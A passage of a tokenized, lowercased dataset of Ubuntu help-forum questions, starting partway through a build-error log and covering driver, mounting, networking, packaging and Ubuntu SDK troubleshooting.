/home/user/vwm/vwm/vwm_wndlist.c:58 : undefined reference to `viper_menu_create' /home/user/vwm/vwm/vwm_wndlist.c:60 : undefined reference to `g_malloc0' /home/user/vwm/vwm/vwm_wndlist.c:63 : undefined reference to `set_menu_format' /home/user/vwm/vwm/vwm_wndlist.c:65 : undefined reference to `set_menu_mark' /home/user/vwm/vwm/vwm_wndlist.c:67 : undefined reference to `scale_menu' /home/user/vwm/vwm/vwm_wndlist.c:71 : undefined reference to `viper_window_create' /home/user/vwm/vwm/vwm_wndlist.c:72 : undefined reference to `viper_menu_bind' /home/user/vwm/vwm/vwm_wndlist.c:76 : undefined reference to `viper_color_pair' /home/user/vwm/vwm/vwm_wndlist.c:75 : undefined reference to `set_menu_fore' /home/user/vwm/vwm/vwm_wndlist.c:77 : undefined reference to `viper_color_pair' /home/user/vwm/vwm/vwm_wndlist.c:77 : undefined reference to `set_menu_back' /home/user/vwm/vwm/vwm_wndlist.c:82 : undefined reference to `viper_event_set' /home/user/vwm/vwm/vwm_wndlist.c:84 : undefined reference to `viper_window_set_key_func' /home/user/vwm/vwm/vwm_wndlist.c:85 : undefined reference to `viper_window_set_userptr' /home/user/vwm/vwm/vwm_wndlist.c:86 : undefined reference to `viper_window_set_state' /home/user/vwm/vwm/vwm_wndlist.c:88 : undefined reference to `viper_thread_leave' /home/user/vwm/vwm/vwm_wndlist.c:89 : undefined reference to `g_strfreev' /home/user/vwm/vwm/vwm_wndlist.c:54 : undefined reference to `viper_thread_leave' /tmp/ccrc2yxa.o : in function `vwm_fmod_wndlist_on_destroy ' : /home/user/vwm/vwm/vwm_wndlist.c:111 : undefined reference to `viper_thread_enter' /home/user/vwm/vwm/vwm_wndlist.c:127 : undefined reference to `viper_menu_destroy' /home/user/vwm/vwm/vwm_wndlist.c:129 : undefined reference to `viper_thread_leave' /tmp/ccrc2yxa.o : in function `vwm_fmod_wndlist_on_keystroke ' : /home/user/vwm/vwm/vwm_wndlist.c:141 : undefined reference to `viper_window_get_userptr' /home/user/vwm/vwm/vwm_wndlist.c:151 : undefined reference to `viper_thread_enter' /home/user/vwm/vwm/vwm_wndlist.c:170 : undefined reference to `viper_window_redraw' /home/user/vwm/vwm/vwm_wndlist.c:171 : undefined reference to `viper_thread_leave' /home/user/vwm/vwm/vwm_wndlist.c:156 : undefined reference to `current_item' /home/user/vwm/vwm/vwm_wndlist.c:158 : undefined reference to `viper_window_destroy' /home/user/vwm/vwm/vwm_wndlist.c:166 : undefined reference to `viper_thread_leave' /home/user/vwm/vwm/vwm_wndlist.c:145 : undefined reference to `menu_driver' /home/user/vwm/vwm/vwm_wndlist.c:146 : undefined reference to `getmouse' /home/user/vwm/vwm/vwm_wndlist.c:151 : undefined reference to `viper_thread_enter' /home/user/vwm/vwm/vwm_wndlist.c:153 : undefined reference to `menu_driver' /home/user/vwm/vwm/vwm_wndlist.c:152 : undefined reference to `menu_driver' collect2 : error : ld returned 1 exit status make : *** [ vwm ] error 1 twin install twin wget http : //netcologne.dl.sourceforge.net/project/twin/twin/0.6.2/twin-0.6.2.tar.gz tar -xvf twin-0.6.2.tar.gz cd twin-0.6.2/ ./configure make at this point , there is a problem . the terminal output is as follows : make -c include make [ 1 ] : entering directory `/home/user/twin/twin-0.6.2/include' make autogen -c tutf make [ 2 ] : entering directory `/home/user/twin/twin-0.6.2/include/tutf' make [ 2 ] : nothing to be done for `autogen ' . make [ 2 ] : leaving directory `/home/user/twin/twin-0.6.2/include/tutf' make autogen -c tw make [ 2 ] : entering directory `/home/user/twin/twin-0.6.2/include/tw' make [ 2 ] : nothing to be done for `autogen ' . make [ 2 ] : leaving directory `/home/user/twin/twin-0.6.2/include/tw' make autogen -c tt make [ 2 ] : entering directory `/home/user/twin/twin-0.6.2/include/tt' make [ 2 ] : nothing to be done for `autogen ' . make [ 2 ] : leaving directory `/home/user/twin/twin-0.6.2/include/tt' make [ 1 ] : leaving directory `/home/user/twin/twin-0.6.2/include' make -c docs make [ 1 ] : entering directory `/home/user/twin/twin-0.6.2/docs' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/user/twin/twin-0.6.2/docs' make -c themes make [ 1 ] : entering directory `/home/user/twin/twin-0.6.2/themes' make -c hw_gfx make [ 2 ] : entering directory `/home/user/twin/twin-0.6.2/themes/hw_gfx' ln -f -s shinymetal_6x13.xpm default_6x13.xpm ln -f -s absolute-e_8x16.xpm default_8x16.xpm ln -f -s ganymede_9x19.xpm default_9x19.xpm make [ 2 ] : leaving directory `/home/user/twin/twin-0.6.2/themes/hw_gfx' make [ 1 ] : leaving directory `/home/user/twin/twin-0.6.2/themes' make -c libs make [ 1 ] : entering directory `/home/user/twin/twin-0.6.2/libs' make -c libtutf make [ 2 ] : entering directory `/home/user/twin/twin-0.6.2/libs/libtutf' gcc -d_reentrant -o2 -fomit-frame-pointer -fno-strict-aliasing -wall -wshadow -wno-uninitialized -wno-pointer-sign -d_gnu_source -i../../include -s ../../scripts/endianity.c -o ../../scripts/endianity ../../scripts/endianity > ../../include/tw/endianity.h gcc -d_reentrant -o2 -fomit-frame-pointer -fno-strict-aliasing -wall -wshadow -wno-uninitialized -wno-pointer-sign -d_gnu_source -i../../include -s ../../scripts/getsizes.c -o ../../scripts/getsizes ../../scripts/getsizes > ../../include/tw/datasizes.h gcc -d_reentrant -o2 -fomit-frame-pointer -fno-strict-aliasing -wall -wshadow -wno-uninitialized -wno-pointer-sign -d_gnu_source -i../../include -s ../../scripts/mkdep.c -o ../../scripts/mkdep cat ../../scripts/unitypes32.in > ../../include/tw/uni_types.h building ../../.hdepend building ../../include/tw/twautoconf.h /bin/bash ../../scripts/configure.tty `` ../../ '' `` ../../ '' < /dev/null > /dev/null || \ /bin/sh ../../scripts/configure.fallback `` ../../ '' `` ../../ '' < /dev/null > /dev/null building .depend building .modules make [ 2 ] : leaving directory `/home/user/twin/twin-0.6.2/libs/libtutf' make [ 2 ] : entering directory `/home/user/twin/twin-0.6.2/libs/libtutf' .modules:1 : *** missing separator . stop . make [ 2 ] : leaving directory `/home/user/twin/twin-0.6.2/libs/libtutf' make [ 1 ] : *** [ build-dir-libtutf ] error 2 make [ 1 ] : leaving directory `/home/user/twin/twin-0.6.2/libs' make : *** [ build-dir-libs ] error 2
463867	file-roller : -p option at *.tar archives ?	is the gui archive manager file-roller automatically using the `` -p '' option ( preserve permissions ) to create tar and tar.gz archives ? ( it is n't mentioned in the gnome documentation )
463868	how can i ditch windows completely for ubuntu ?	i want to switch completely to a linux distribution ( preferably ubuntu ) however , there are two main factors working against it : i have an iphone 5 , running ios 7.1.1 as my daily driver . i mainly use it to listen to songs and copy some documents over using itunes . now , the documents part is handled quite well by 14.04 lts mainly because of the updated libimobiledevice library , but i still have n't found a way to sync music into it . this is pretty much a deal-breaker . my laptop is an alienware m14x r2 , and obviously it has those fancy led lights . every once in a while , i tweak the led colors to match my current wallpaper , but this is something i do n't think i can do in ubuntu . again , a deal-breaker . i can , obviously , dual-boot both windows and ubuntu , but being a long-time windows user that i am , i might find myself booting into windows more than ubuntu ; something i do n't want to happen ( remember , i want to ditch windows compeltely ) . so , to rephrase my question - is there a workaround for those two issues ? any help would be appreciated , thanks !
463869	how to hide the header of the tabs component	i 'm writing an app using the ubuntu sdk , and i 've got a pagestack component inside atabs component . when i load one of the pages inside the pagestack , it all works well , and in the header the name of the current tab is shown . however , if when the page is open instead of hitting the back button from the toolbar i choose another tab , it totally confuses the toolbar , which then no longer shows the back button . is there a way to make my pages full screen , so that the header with the name of the current tab is not shown ( and thus can not be tapped ) , or even better , to show the title of the current page in the header instead of the parent tab title ? tabs { id : tabs tab { objectname : `` tabqreator '' title : i18n.tr ( `` create '' ) page : creatorpage { id : pagecreator } } // ... } and on creatorpage.qml : pagestack { id : pagestack anchors { fill : parent } component.oncompleted : push ( pageroot ) page { id : somepage // toolbar definition here ... } page { id : pageroot title : i18n.tr ( `` the root page '' ) visible : false // ... }
463873	how to save current directory path from terminal	is there any way to save the path of the current directory from the current gnome terminal window . i need this to when i open another terminal refuse to type cd repeatedly again ?
463877	why ca n't i extract a .rar archive ?	i have installed unrar and have been using the command sudo unrar x filename.rar in the terminal but it gives me this error : no such file or directory , no file to extract i have looked through all the answers of other people 's questions and none of them are working for me . any ideas ?
463882	which keys to go up or down in terminal	when i open terminal i do not like to use mouse so i had trouble when i want to go upper in the page or go down the page . so is there any key switch for that in order to navigate the page without mouse ? - i do not say navigate the window -
463883	ca n't access user accounts in ubuntu 14.04 lts	i installed ubuntu 14.04 lts as a dualboot next to windows . everything is working fine and i must say i like it . but i have one problem , i ca n't access the user accounts . by clicking on user accounts the screen goes black and grey and nothing happens . i can only use the x to close the window . i also tried to access it using the terminal window but the same negative result . how can i fix this ?
463890	can not access installed applications from hud	i was trying to get rid of dash plugins within the search , so i created & copied a list of my scopes and used : gsettings set com.canonical.unity.lenses disabled-scopes `` [ $ ( find /usr/share/unity/scopes/ -name \*.scope -printf `` ' % p ' , '' |sed -es ' : / : - : g ' -e's/ , $ // ' ) ] '' from here which totally blanked out the search hud -as in no access to installed apps or files . however when i try to use gsettings set com.canonical.unity.lenses enable-scopes `` [ 'wherever.scope ' ] '' to get indivdual ( or all ) back i get `` no such key enable-scopes '' . so , what am i not doing right to get singular items ( or the the whole thing if need be ) back ?
463891	evolution : sending e-mail from gmail system account	with last system update evolution got gmail integration through system online accounts , and it appeared along with my usual evolution account for gmail . i like integration , but when i turned usual account off , evolution stopped to send e-mails through system account . and i do n't see any setting for it in evolution . so is there a way to answer through evolution with system account , or should i use my old evolution account and turn off gmail integration if i do n't want to see my e-mail box doubled ?
463893	how to achieve root access ? also a more simple breakdown of instructions	need more simple breakdown of the instructions , yes i acknowledge the risks . all i need the access for is for external development ( s ) for android . already have adb installed as well as fastboot plus other goodies for droid developing . i 'm going to try to push the ubuntu `` touch '' software on it .
463896	problem im my key 3g `` connection activation failed '' in 14.04	i have a little problem in my trusty . to beginn with , my mobile broadband works 100 % but there is another connection that appears to be simultaneous . /605020701514404/context1 when i click the new connection the following message appears : following connection activation failed ( 1 ) creating object for path '/org/freedesktop/networkmanager/activeconnection/1 ' failed in libnm-glib . if i then click on connection name option of my key the following message appears : connection activation failed ( 32 ) the connection was not supported by ofono . when i want to create a new connection the create a connection for mobile broadband option contains two choices empty any device
463898	ubuntu 14.04 two finger scroll	i have a lenovo z510 . i recently multibooted it with ubuntu 14.04 i have tried a lot , but i could n't enable a two finger scroll . there is no option for it in mouse settings . i also tried using ubuntu tweak tool , but with no effect . pls help me out
463899	high pitched sound by hdmi on kubuntu 14.04	this is the result of alsa information script . http : //paste.debian.net/plainh/4cc082fc i have the same issue as seen in the following thread : http : //ubuntuforums.org/showthread.php ? t=2185474 does somebody have a hint ? thanks !
463907	how to add rows ( so to have multi rows ) bottom panel in gnome-session-flashback in ubuntu 14.04 32bit ?	i 'm experiencing ubuntu 14.04lts 32bit with gnome-session-flashback very , very useful for me ! just i need to double rows in bottom panel 'cause i use a lot of opened windows/apps but i really i do n't know how do that ! i followed some guide and i modified pixel from 24 to 48 but it does n't double the panel instead of bigger it and windows inside it . ( i suppose this way works fine with some other de not with gnome-session-flashback ! ! ) any idea/suggestion please ? a cold beer is ready to solver
463908	how to restore windows bootloader after upgrading windows ?	i previously upgraded ubuntu to 14.04 and that left me with many broken packages and unmet dependencies . so i have to install the ubuntu 14.04 through bootable usb flash . i choosed the option reinstall ubuntu 14.04 while installing rather than reinstall alongside windows . i know i messed up . so , now there is no option as windows 7 in the grub menu . but i can see the windows partitions are safely kept and i can browse them . so i think the problem is only in the bootloader . i have no windows cd in hand now . is there any way to fix this ?
463910	toshiba satellite ( c855d ) refuses to go into standby and hibernation	just upgraded the laptop to an ssd , fresh install of ubuntu , but even in older versions had the same exact issue . have n't been able to figure this out much . tried reinstalling under the uefi signed to see if it would fix the fix , but refuses to install .
463913	can i block root ssh access from external notwork , but not from the local lan	os : ubuntu 14.04 i would like to root login from ssh locally , because backuppc needs that . i would like to block an external access with root login . thanks
463914	why is my conky shown above other windows ?	my conky is running in the foreground = ( does anybody know how to fix it ? i am running trusty tahir .
463915	will my software work with ubuntu	i have a specific software to fun my embroidery machine , and up to now has only worked on windows xp , now that there is no longer support for this i would like to know if my software will run on ubuntu ?
463916	install ubuntu 14.04 alongside windows 7 fails	when i try to install ubuntu 14.04 lts desktop alongside windows7 , my notebook reboots and starting to boot windows again . i tried several times but same thing here . i have acer aspire 5750 notebook
463919	make new variant keyboard layout available in settings ?	i’ve edited the file /usr/share/x11/xkb/symbols/gb to add a new variant keyboard layout . however , it 's not showing up as available to add in settings > text entry . how can i get this list to refresh , so that the new variant shows up ? what i’ve tried so far ( based on advice found elsewhere ) : restart ; delete the *.xkm files in /var/lib/xkb ( cached compiled keyboard layouts ) . is there some table where i need to add an entry for the new variant ? or is there some other cache i need to clear ? i’m running 14.04 .
463920	ubuntu 14.04 menu bar does n't respond	i have a problem with menu bar in newest ubuntu 14.04 . a lot of time the menu bar does n't respond for my clicks . i 've captured this odd situation in the video down below . would appreciate any help . http : //youtu.be/h32khpsgdf0
463929	how to change my /boot/efi mount partition ?	when installing ubuntu i unknowingly set my efi mount to the windows efi partition . now i need to delete windows along with its efi partition for a fresh install . i already have another partition prepped up to be the ubuntu efi boot partition . how do i migrate /boot/efi to that partition ?
463930	upgrading the kubuntu	dear friends is there any command line to upgrade from kubuntu 13.10 to kubuntu 14.04 . if yes then please help .
463931	how can i keep something running but run other terminal commands ?	i 'm sure this is a really stupid question and it 's probably already been asked a dozen times on this site , and i just do n't know which keywords to search . i 'm still really new to managing a server and new to the command line in general , but it 's something i 've been wanting to try for a long time . right now i have ubuntu server ( no gui ) running a node.js web server . how can i keep node running while executing other commands on the command line ? for example : node /var/www/my_app.js this command prevents me from running other commands until i terminate it with ctrl + c. but what if i want to run a redis-cli command while leaving node running in the background ? in other words : how can i exit out of the node.js context without stopping the node server ? and after i do ( 1 ) , how can i return to the node context ? i do n't know if ( 2 ) makes sense for the node command , but , for example , if i ran nodemon instead , i can run a rs ( restart ) command while nodemon is running . thanks , and apologies if this is a duplicate and/or really obvious question .
463937	issues with installing splashtop streamer , ( beta )	i 'm new to ubuntu and this forum too , so sorry if i break any posting rules or asking a stupid question . i 'm trying to install splashtop streamer , on ubuntu 14.04 , however i get the following error message . package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details : the following packages have unmet dependencies : splashtop-streamer : depends : libx264-123 but it is not going to be installed can anyone help ? or recommend something to remote desktop from android to ubuntu 14.04 regards richard
463938	how to go back from a pagestack 's page to the parent tab in the ui toolkit	so in a previous question i tried to use the ubuntu ui toolkit to nest a pagestack within the tabs component . it seemed to work , but it had its quirks , so i 'm now trying another option , which in theory should have the same effect according to the documentation . however , with the code below , i 've noticed the following : upon opening page3 , if i then pull the toolbar and tap on the back button , it always returns me to to the initial tab in tabs , instead of the actual tab that the page was loaded from . that is , page3 is loaded from tab2 , but if i open the page , pull the toolbar from the bottom and hit back , i 'm returned to tab1 instead . how can i make it so that tapping back returns me to tab2 ? import qtquick 2.0 import ubuntu.components 1.1 mainview { id : mainview width : units.gu ( 38 ) height : units.gu ( 50 ) pagestack { id : pagestack component.oncompleted : push ( tabs ) tabs { id : tabs tab { id : tab1 title : `` tab 1 '' page : page { label { anchors.centerin : parent text : `` use header to navigate between tabs '' } } } tab { id : tab2 title : `` tab 2 '' page : page { button { anchors.centerin : parent onclicked : pagestack.push ( page3 ) text : `` press '' } } } } page { id : page3 visible : false title : `` page on stack '' label { anchors.centerin : parent text : `` press back to return to the tabs '' } } } }
463939	wine automatically removed from system ; can not reinstall	i 'm using ubuntu 12.04 , and did not run on any major issues , until today . my logs showed that yesterday , may 9 , 2014 my system performed an automatic dist-upgrade . with that dist-upgrade , it uninstalled wine ( 1.6 ) . so i can not run wine-based programs now . ( i tried waiting for a day and repeatedly tried sudo apt-get update ; sudo apt-get dist-upgrade without success . ) sudo apt-get install wine or sudo aptitude install wine does not install wine , instead error like this is encountered : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed or wine1.7 but it is not going to be installed did anybody else experience similar breakage lately ?
463942	temperature problem in ubuntu 14.04	i have installed ubuntu 14.04 lts ( dual booting with windows 8.1 ) in my dell inspiron n7520 , which comes with a dedicated vga amd radeon hd7730m . there had occurred some heating problems in ubuntu , so i installed tlp and some additional application that shows frequency of the processor , that shows solved the problem , but when i tried sensors command in terminal it shows that cpu temperature is [ ok ] ( between the limits ) . but temperature of vga is too high ( current temp as +511째c and critical level is +120째c ) . what should i do for fixing the above problem ? -- please help !
463943	how can i add rules in nvidia-settings with nvidia-prime ?	i know to switch nvidia card but i have to restart x. i would like to know how configure nvidia-prime to run a program automatic with nvidia card . for example : blender before i used to use bumblebee and only i needed this command `` optirun `` , but with nvidia-prime i do n't know . thanks en español ( spanish ) : sé como cambiar de una tarjeta gráfica a otra pero tengo que reiniciar x. quisiera saber si es posible configurar nvidia-prime para ejecutar un programa con la tarjeta nvidia sin tener que cambiar de intel a nvidia reiniciando x. por ejemplo : que blender siempre utilice la tarjeta nvidia . antes con bumblebee solo tenía que ejecutar `` optirun `` , pero ahora no tengo ni idea y nvida-prime funciona francamente bien . gracias .
463946	3 monitors and mouse flicklering	i have done a fresh ubuntu 14.04 64bit install , i have three monitors , two of them are conected to an nvidia pci-e card , the other is conected to motherboard 's intel video card . the problem is that the monitor connected to the intel is not detected correctly ( it 's an aoc monitor ) , so it appears as unknown , after playing with xrandr i managed to have it display at the correct 1366x768 native resolution . the flickering of the mouse ( in the monitors controlled by the nvidia card ) is caused by this `` unknown monitor '' issue , how can i fix it ? on the nvidia i have another aoc monitor and a viewsonic , both of them are detected correctly , but the mouse flickers or dissapears .
463949	how do i install the wifi drivers ?	i have been having problems with my wifi connection on my dell using ubuntu as os . i am new to the os and trying to fix the issues i ended up un-installing the driver for the network controller . description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : 73 width : 64 bits clock : 33mhz above the details of the controller . could you please tell me how to re-install the drivers and what to do after so it will work properly ( it was constantly disconnecting ) ? thanks .
463956	mount external hard drive with /etc/fstab on ubuntu 14.04 problems	i have been stuck for about two days trying to get this to work properly . i have done all of the following with still no luck . i 'm trying to auto permanently mount to a 2 tb seagate central that is on my network , using ubuntu 14.04 lts desktop and i updated all cifs before starting . i added the following line to /etc/fstab as root : # mapping network drive //ip-address/media/videos /media/storage cifs username=username , password=password , iocharset=utf8 , sec=ntl i also swapped out the ip-address for its name as well . since i know this is not the most secure way , but i 'm the only one using this ubuntu-desktop also tried the credentials document method without luck . in the terminal : sudo mount -a mount error ( 22 ) : invaild argument refer to mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) after seeing that i tried the following : sudo mount.cifs //seagate-xxxxx/media/videos /media/storage i was then promoted for the password to the network storage and enter in correctly : error : mount error ( 115 ) : operation now in progress refer to mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) i got it to work one time , but i had to reinstall ubuntu after that , and ca n't seem to get it back working . i 've looked up many different videos and forums and i 'm doing this so i can set up my plex server to see my media folder on a external hard drive . i have red and watched the following links/videos to no avail [ please help ! ] : mountwindowssharespermanently mounting-ntfs-drives-on-linux mounting network drive in fstab ubuntu 14.04 https : //www.youtube.com/watch ? v=qbpxgvxovtq
463958	ubuntu 14.04 does not recognize sound card	good afternoon everyone ! i 'm going to be objective in my problem . before i was using windows 8 on my notebok and ubuntu on the desktop . i decided to test the update 14.04 in the notebook , installed and worked perfectly , when one day i called and the sound was n't working anymore , i went to look at the audio configuration and saw that he was n't recognizing the audio card . can someone help me ? $ aplay : device_list:268 : no sound card found ... $ lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) subsystem : compal electronics inc device 0032 flags : fast devsel , irq 22 memory at f2a00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 print the configuration
463959	how to download free games	https : //apps.ubuntu.com/cat/applications/motorbike/ not able to down load games from here . from where do i download free games for my ubuntu .
463960	how does mounting ( or unmounting ) a partition affect the performance of the system ?	just curious to know : how does mounting ( or unmounting ) a partition affect the performance of the system ? i have a fairly large partition where have stored backups , software and old files that i do n't need to access unless i rarely happen to . but i have set this partition to auto-mount at start-up along with other partitions . i just wanted to know if keeping this partition unmounted would save some resources in some way . thank you for your time in advance !
463964	wifi not working after upgrade from 12.04 to 14.04 < access denied >	hardline working fine ; just no wifi . $ lspci -v | grep -ia7 network 0b:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) subsystem : dell wireless 1395 wlan mini-card flags : bus master , fast devsel , latency 0 , irq 17 memory at fe7fc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : b43-pci-bridge $ lsmod | grep b43-pci-bridge $ lsmod | grep b43 b43 387371 0 bcma 52096 1 b43 mac80211 626489 1 b43 cfg80211 484040 2 b43 , mac80211 ssb 62379 1 b43 $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : sky2 state : connected default : yes hw address : 00:21:9b : ed : a6:84 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.8 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1
463967	wired network disconnected - you are now offline	i installed a new pci network card on my dell optiplex 760 and i keep seeing a popup message that says : wired network disconnected - you are now offline when i run lshw -c network , i am able to see the new network card : description : ethernet interface product : dge-530t gigabit ethernet adapter vendor : d-link system inc logical name : eth0 i went and added the following into /etc/network/interfaces auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet dhcp i also updated the /etc/networkmanager/networkmanager.conf and updated the following : [ ifupdown ] managed=true and restarted the services , but even after that it has not helped . i am out of ideas now . any help is appreciated .
463972	live usb creator software	is there a program that can make live usbs for any distro , iso , you get the point . i can only find ones that make live usbs for other linux distributions and none for anything else .
463976	ubuntu 14.04 64bit - 'gstreamer ffmpeg video plugin ' problem	i ca n't install gstreamer0.10-ffmpeg on ubuntu 14.04
463977	how to set /usr/bin/i586-mingw32msvc-g++ to gww ?	i use cross compiling for c++ using mingw ... i use /usr/bin/i586-mingw32msvc-g++ filename.cpp to compile , but i want to be able to type gww filename.cpp i think i need to set a path variable or something ? note please note i am quite inexperienced with linux , but can get around easily with the terminal and stuff . if this is very basic , tell me how to do it.. note that this is a very hard search engine hit ( set /usr/bin/i586-mingw32msvc-g++ ? ) , sick !
463979	bind9 wo n't work after virtualbox import	i made an update from ubuntu 13.04 to 14.04 for my host computer and before updating i copied all the virtualbox contents - i had an 12.04 lts server and a client . after updating i imported them again and it turns out that the name resolution does n't work anymore some why . i can successfully service restart bind9 and named-checkconf /etc/named.conf without a hiccup . after some trial and error when i added the ip 's in /etc/hosts in my client then the name resolution worked but still not quite the way it should - had wp , dvwa and both their databases were also broken . i do n't why it never worked again because everything worked like a charm before the host update . if anybody got any ideas then i would be grateful beyond words . thanks mates . johannes
463980	install : can not mount filesytem.squashfs	i 'm trying to install ubuntu for the first time and since my pc does n't support boot from usb , i 've trying to install ( dualboot ) ubuntu 14.04lts . i have the iso ( 64bit ) burned as image to a dvd+r using win7 default burn disc image feature . when i restart my windows 7 pc , i see ubuntu logo come up , then it goes black as says something like : `` can not mount filesystem.squashfs on // filesystem.squashfs '' . i have no idea what that means . pc specs fyi athlon ii x2 2.7ghz 4gb ram over 400gb hardrive space available please advise .
463981	launching text editors with privileges without terminal	i switched to ubuntu so that i could run my webserver on hhvm rather than wamp . but i 'm encountering basic problems that are slowing down my development time significantly . i feel this is probably a simple issue to address , but every post on the internet is `` here 's how you do this in terminal , and here 's why it 's the most dangerous thing in the world . '' what i 'm looking for is pretty simple : i want to load sublime ( or gedit , or text editor of choice ) and edit files in the /var/www directory without having to change the owner , group , or permissions of the /var/www directory . i do n't want to load my text editor through terminal - i just want to click on the side bar , choose a file , and it works . i realize that as developers , yes , we can jump through hoops to resolve these problems on an individual basis through the terminal . but i just want to load up the desktop and enter the project without having to worry about loading several new commands when i need to change a virtual directory in /etc/nginx or something . how can i have a one-click solution to the `` privileges denied '' issues when trying to locally edit system files / files that are protected for a reason ? bearing in mind i only want to do this locally , thus not wanting to change their protective settings . edit : this question is 95 % resolved . it would be preferable if ubuntu desktop version were slightly more accessible for development purposes for superusers , but the accepted answer by jacob addresses the main issue and showcases some interesting functionality with ubuntu .
463982	vimeo malfunction	apropos of nothing at all suddenly vimeo videos are n't working . all i get is a black screen . it was working fine a few days ago . this is on chrome on two different machines , both running 12.04 . it works on ipad ok and on chrome on xp so seems to be ubuntu related . i 've updated , flushed the cache , disabled hardware acceleration . youtube is fine . any ideas much appreciated
463988	unable to find a medium with a live file system in ubuntu 14.04 using wubi windows installer	hi i am installing ubuntu 14.04 or any version from wubi ( windows installer ) but after restarting the windows its throws me error that its unable to find a medium with a live system . i also tried with install to create a bootable pen drive but still it didnt work out . i also tried to change the bios to sata from achi but still it showing me the same error . i use ubuntu before but never faced this problem before but now this problem coming why ? ? i m using hp540 laptop with windows7 32 bit help me with this problem
463989	installing the go language	how to correctly install and configure the go language in ubuntu . there are many packages to choose from but which packages do i need to install and what do i need to configure afterwards to be able to use any of the go packages without having a `` can not find package '' error for example or any other basic errors of that kind . i installed the golang package but do i need to install any additional ones or configure something else ? as an example try to run the following : package main import ( `` http '' `` log '' ) func helloserver ( w http.responsewriter , req *http.request ) { w.header ( ) .set ( `` content-type '' , `` text/plain '' ) w.header ( ) .set ( `` connection '' , `` keep-alive '' ) w.write ( [ ] byte ( `` hello , world ! \n '' ) ) } func main ( ) { http.handlefunc ( `` / '' , helloserver ) log.println ( `` serving at http : //127.0.0.1:8080/ '' ) http.listenandserve ( `` :8080 '' , nil ) }
463990	how can i share the internet on my laptop to my wireless network connection in my laptop ?	i set up the wireless network connection on my laptop , then , my local area connection is plugged in . but the wireless connection still has no network access . how can i share the internet in lan to my wireless network connection ? so that i can be able to use my wifi hotspot . please reply as soon as possible ! thank you !
463994	problem mounting second harddrive with ubuntu 14.04	i just installed ubuntu and im completly new with ubuntu . i am trying to get my second harddrive to work but it wo n't . i 've used some guides like this but still no success . the problem is that it does n't see my ntfs as a valid one . i do n't really understand what this means . this is the message the terminal gives me when trying to mount the hard drive : robert @ robert-linux : ~ $ sudo mount -a ntfs signature is missing . failed to mount '/dev/sdb1 ' : invalid argument the device '/dev/sdb1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? robert @ robert-linux : ~ $ hopefully someone can help me out . greetings robert edit /etc/fstab file content : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=d91f5c8b-30d0-4bc7-85cb-e3b26d2e9c1d / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=81cc1c05-8435-4d18-8af5-049d092294cb none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sdb1 /media/disk2 ntfs defaults 0 0
463997	whisker menu as a standalone application launcher	is it possible to somehow force the whisker menu in xubuntu 14.04 to open in the center of the screen ? secondly , after that 's working , would it be possible to remove the icon from the panel ( i 'd access it with a keyboard shortcut ) . so far i 've tried messing around with the place windows plugin in compiz but to no avail - for some reason setting the placement mode of whisker to center does n't do it .
464002	messages while booting 14.04	while booting ubuntu 14.04 after purple screen i can see black screen with these messages : [ 12.207377 ] snd_hda_codec : module has bad taint , not creating trace events [ 12.200502 ] snd_hda_controller : module has bad taint , not creating trace even [ 12.500765 ] i915_bdw : exports duplicate symbol i915_release_power_well [ 12.598736 ] snd_hda_intel 0000:00:00.0 : error request power-well from i915 this messages are shown for a short time , and after computer boot everything seems to work properly , except freezing on suspend ( i post about this before ) . so my question is , how to fix/remove this messages ?
464003	a bad boot command made my system inaccessible	okay , so i made a really stupid mistake . i made a shell script that runs nodemon /path/to/nodejs/file and added it to the boot process via update-rc.d mystartup.sh defaults 99 , thinking i could use this to automatically start my node.js server on boot in case/when i restart my server . node and nodemon are commands that , when run , change the command context so that i can run node-related commands . i can then exit out of the process by pressing ctrl + c. but when i boot , it 's like the machine has n't registered my i/o devices and i ca n't type , so i ca n't quit ( or execute any other command ) . nodemon just runs . is there some other way i can remove this startup command ? it 's farfetched , but i really screwed it up and i am not sure how to proceed .
